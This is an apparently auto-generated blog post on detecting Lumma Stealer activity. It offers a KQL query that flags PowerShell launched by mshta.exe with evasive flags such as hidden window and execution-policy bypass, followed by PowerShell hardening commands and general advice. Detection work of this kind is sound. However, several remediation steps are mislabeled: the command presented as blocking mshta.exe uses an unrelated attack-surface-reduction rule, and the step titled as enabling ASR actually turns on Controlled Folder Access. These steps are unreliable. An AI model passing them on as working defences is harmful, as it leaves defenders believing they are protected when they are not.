Detecting Suspicious Lumma Stealer Behavior with KQL

Listen to this Post

In this article, we explore how to detect suspicious Lumma Stealer behavior using Kusto Query Language (KQL). The focus is on identifying malicious PowerShell executions initiated by mshta.exe, a common technique used by attackers.

KQL Query for Detection

[kql]
DeviceProcessEvents
| where FileName == “powershell.exe”
| where InitiatingProcessFileName == “mshta.exe”
| where ProcessCommandLine has_any (“-windowstyle hidden”,”-w hidden”, “-executionpolicy bypass”,”-ep bypass”, “-noprofile”, “-nop” )
[/kql]

Key Indicators

  • FileName: `powershell.exe`
    – InitiatingProcessFileName: `mshta.exe`
    – ProcessCommandLine: Includes suspicious arguments like -windowstyle hidden, -executionpolicy bypass, and -noprofile.

Practical Commands for Detection

1. Monitor PowerShell Execution:

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -match "mshta.exe" }

2. Block `mshta.exe` Execution:

Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled

3. Enable ASR (Attack Surface Reduction):

Set-MpPreference -EnableControlledFolderAccess Enabled

What Undercode Say

In the ever-evolving landscape of cybersecurity, detecting and mitigating threats like Lumma Stealer requires a proactive approach. By leveraging KQL queries, we can identify suspicious PowerShell activities initiated by mshta.exe, a common vector for malware delivery. The provided KQL query focuses on specific command-line arguments that are often used to evade detection, such as `-windowstyle hidden` and -executionpolicy bypass.

To enhance your defenses, consider implementing the following practices:
– Baseline Normal Behavior: Regularly baseline normal system behavior to identify anomalies. For example, monitor Event ID 4104 for PowerShell script block logging.
– Block Suspicious Executables: Use tools like Microsoft Defender’s Attack Surface Reduction (ASR) to block `mshta.exe` and other high-risk executables.
– Adaptive Detection: Continuously update your detection rules to account for new obfuscation techniques, such as using `-ep` instead of -executionpolicy.

Additionally, integrating threat intelligence feeds and automating response actions can significantly reduce the time to detect and respond to such threats. For further reading on PowerShell obfuscation techniques, refer to Microsoft’s documentation on PowerShell security.

By combining these strategies, you can build a robust defense mechanism against advanced threats like Lumma Stealer, ensuring your systems remain secure in an increasingly hostile digital environment.

References:

Hackers Feeds, Undercode AIFeatured Image